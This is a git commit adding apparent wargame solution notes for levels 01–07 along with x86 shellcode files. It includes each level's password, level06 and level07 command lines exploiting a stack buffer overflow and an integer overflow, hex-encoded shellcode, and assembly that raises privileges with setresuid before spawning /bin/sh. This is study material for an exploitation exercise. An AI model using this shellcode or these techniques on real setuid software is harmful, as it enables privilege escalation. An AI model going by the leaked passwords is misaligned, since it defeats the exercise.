summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
-rw-r--r--level012
-rw-r--r--level028
-rw-r--r--level034
-rw-r--r--level047
-rw-r--r--level054
-rw-r--r--level0622
-rw-r--r--level0715
-rw-r--r--shellcode/exec-reloc-nozero.S10
-rw-r--r--shellcode/exec-reloc.S11
-rw-r--r--shellcode/exec-suid.S21
-rw-r--r--shellcode/exec-suid.asm19
-rw-r--r--shellcode/exec.S8
-rw-r--r--shellcode/exec.asm8
13 files changed, 139 insertions, 0 deletions
diff --git a/level01 b/level01
new file mode 100644
index 0000000..68c986d
--- /dev/null
+++ b/level01
@@ -0,0 +1,2 @@
+just disassemble it
+level02 XNWFtWKWHhaaXoKI
diff --git a/level02 b/level02
new file mode 100644
index 0000000..38f1ca9
--- /dev/null
+++ b/level02
@@ -0,0 +1,8 @@
+level2:
+abs(0x80000000) = 0x80000000 is still negative
+0x80000000/(-1) will trigger a division exception
+
+level2_alt:
+note that NAN is not smaller or higher than any number
+
+level03 OlhCmdZKbuzqngfz
diff --git a/level03 b/level03
new file mode 100644
index 0000000..3fe4a90
--- /dev/null
+++ b/level03
@@ -0,0 +1,4 @@
+just a buffer overflow
+note that if the input is too long, it'll override the value of argv, which will cause a segfault when trying to get the value of argv[1]
+
+level04 7WhHa5HWMNRAYl9T
diff --git a/level04 b/level04
new file mode 100644
index 0000000..9f01fcb
--- /dev/null
+++ b/level04
@@ -0,0 +1,7 @@
+level04:
+just modify $PATH
+
+level04_alt:
+the IFS attack seems not working, someone said using shellshock
+
+level05 DNLM3Vu0mZfX0pDd
diff --git a/level05 b/level05
new file mode 100644
index 0000000..22154c5
--- /dev/null
+++ b/level05
@@ -0,0 +1,4 @@
+buffer overflow, stack is randomized, put shellcode after return address and pad nops
+shellcode: should use setresuid first
+
+level06 fQ8W8YlSBJBWKV2R
diff --git a/level06 b/level06
new file mode 100644
index 0000000..9e18250
--- /dev/null
+++ b/level06
@@ -0,0 +1,22 @@
+考虑到栈地址随机化,而
+struct UserRecord{
+ char name[40];
+ char password[32];
+ int id;
+};
+只有72字节的空间可供攻击者填写,因此考虑将shellcode置于环境变量中。
+经过调试发现,环境变量放在 0xc0000000 之前的区域中,假设原环境变量共有 X 字节,则只要在环境变量中写一段 ``X字节nop + shellcode + X字节nop``,把栈溢出的返回地址改写为
+0xc0000000 - 2X - size(shellcode),那么便可以执行环境变量中的 shell code. 通过 ``env | wc -c`` 可看出环境变量小于 512 字节,让 X 为 512 即可。
+此外 greeting 到 ebp 处的距离为 0x48 字节,加上 old ebp 和返回地址为 0x50 = 80 字节,而我们只能往 UserRecord 写 72 字节,因此需要将 LANG 设为 fr 或 de 使得 greeting 开头更长一些。
+
+r2 malloc://2048
+[0x00000000]> 512 wxs 90
+[0x00000200]> wxs 31c004c9cd8089c389c189c231c004d0cd8031c0040bbb1f43583081f33030303053682f62696e89e331c931d2cd80
+[0x0000022f]> 512 wxs 90
+[0x0000042f]> wtf /tmp/shell.bin 0x42f @ 0
+
+export A=`cat /tmp/shell.bin`
+export LANG=de
+/levels/level06 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `printf '0123456789012345678901234\xc0\xfb\xff\xbfaaaaa'`
+
+level07 U3A6ZtaTub14VmwV
diff --git a/level07 b/level07
new file mode 100644
index 0000000..36a0bc8
--- /dev/null
+++ b/level07
@@ -0,0 +1,15 @@
+注意以下代码中 count 是有符号数,只要使 count 为负数,而 count * sizeof(int) 为一个比较小的整数,则既能绕过 count >= 10 的检测,又能使程序正常运行::
+
+ int count = atoi(argv[1]);
+ int buf[10];
+ if(count >= 10 )
+ return 1;
+ memcpy(buf, argv[2], count * sizeof(int));
+
+经过逆向,buf 的地址是 ebp-0x48,count 的地址是 ebp-0xc,因此一共需要写 0x40 字节。我们让 count = 0x80000000 | (0x40 / sizeof(int)) = 0x80000010 = -2147483632 即可。
+
+顺便说一下,这关通过的条件是 count == 0x574f4c46,就是字符串 FLOW,暗示了是整数溢出。
+
+/levels/level07 -2147483632 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abFLOW
+
+level8 VSIhoeMkikH6SGht
diff --git a/shellcode/exec-reloc-nozero.S b/shellcode/exec-reloc-nozero.S
new file mode 100644
index 0000000..f5e2765
--- /dev/null
+++ b/shellcode/exec-reloc-nozero.S
@@ -0,0 +1,10 @@
+.global _start
+_start:
+ xorl %eax,%eax
+ addb $11, %al
+ movl $0x3058431f, %ebx
+ xorl $0x30303030, %ebx # "/sh\0"
+ pushl %ebx
+ pushl $0x6e69622f # "/bin"
+ movl %esp, %ebx
+ int $0x80
diff --git a/shellcode/exec-reloc.S b/shellcode/exec-reloc.S
new file mode 100644
index 0000000..077babb
--- /dev/null
+++ b/shellcode/exec-reloc.S
@@ -0,0 +1,11 @@
+.global _start
+_start:
+movl $11, %eax
+call next
+next:
+movl (%esp), %ebx
+addl $(_cmd-next), %ebx
+int $0x80
+_cmd:
+.ascii "/bin/sh"
+.byte 0
diff --git a/shellcode/exec-suid.S b/shellcode/exec-suid.S
new file mode 100644
index 0000000..94ec68a
--- /dev/null
+++ b/shellcode/exec-suid.S
@@ -0,0 +1,21 @@
+.global _start
+_start:
+ xorl %eax, %eax
+ addb $201, %al # geteuid
+ int $0x80
+ movl %eax, %ebx
+ movl %eax, %ecx
+ movl %eax, %edx
+ xorl %eax, %eax
+ addb $208, %al # setresuid
+ int $0x80
+ xorl %eax, %eax
+ addb $11, %al
+ movl $0x3058431f, %ebx
+ xorl $0x30303030, %ebx # "/sh\0"
+ pushl %ebx
+ pushl $0x6e69622f # "/bin"
+ movl %esp, %ebx
+ xorl %ecx, %ecx
+ xorl %edx, %edx
+ int $0x80
diff --git a/shellcode/exec-suid.asm b/shellcode/exec-suid.asm
new file mode 100644
index 0000000..b978195
--- /dev/null
+++ b/shellcode/exec-suid.asm
@@ -0,0 +1,19 @@
+xor eax, eax
+add al, 201
+int 0x80
+mov ebx, eax
+mov ecx, eax
+mov edx, eax
+xor eax, eax
+add al, 208
+int 0x80
+xor eax, eax
+add al, 11
+mov ebx, 0x3058431f
+xor ebx, 0x30303030
+push ebx
+push 0x6e69622f
+mov ebx, esp
+xor ecx, ecx
+xor edx, edx
+int 0x80
diff --git a/shellcode/exec.S b/shellcode/exec.S
new file mode 100644
index 0000000..660057b
--- /dev/null
+++ b/shellcode/exec.S
@@ -0,0 +1,8 @@
+.global _start
+_start:
+movl $11, %eax
+leal _cmd, %ebx
+int $0x80
+_cmd:
+.ascii "/bin/sh"
+.byte 0
diff --git a/shellcode/exec.asm b/shellcode/exec.asm
new file mode 100644
index 0000000..ca8960d
--- /dev/null
+++ b/shellcode/exec.asm
@@ -0,0 +1,8 @@
+mov al, 0x70
+sub al, 0x65
+mov ebx, 0x30584361
+xor ebx, 0x3030304e
+push ebx
+push 0x6e69622f
+mov ebx, esp
+int 0x80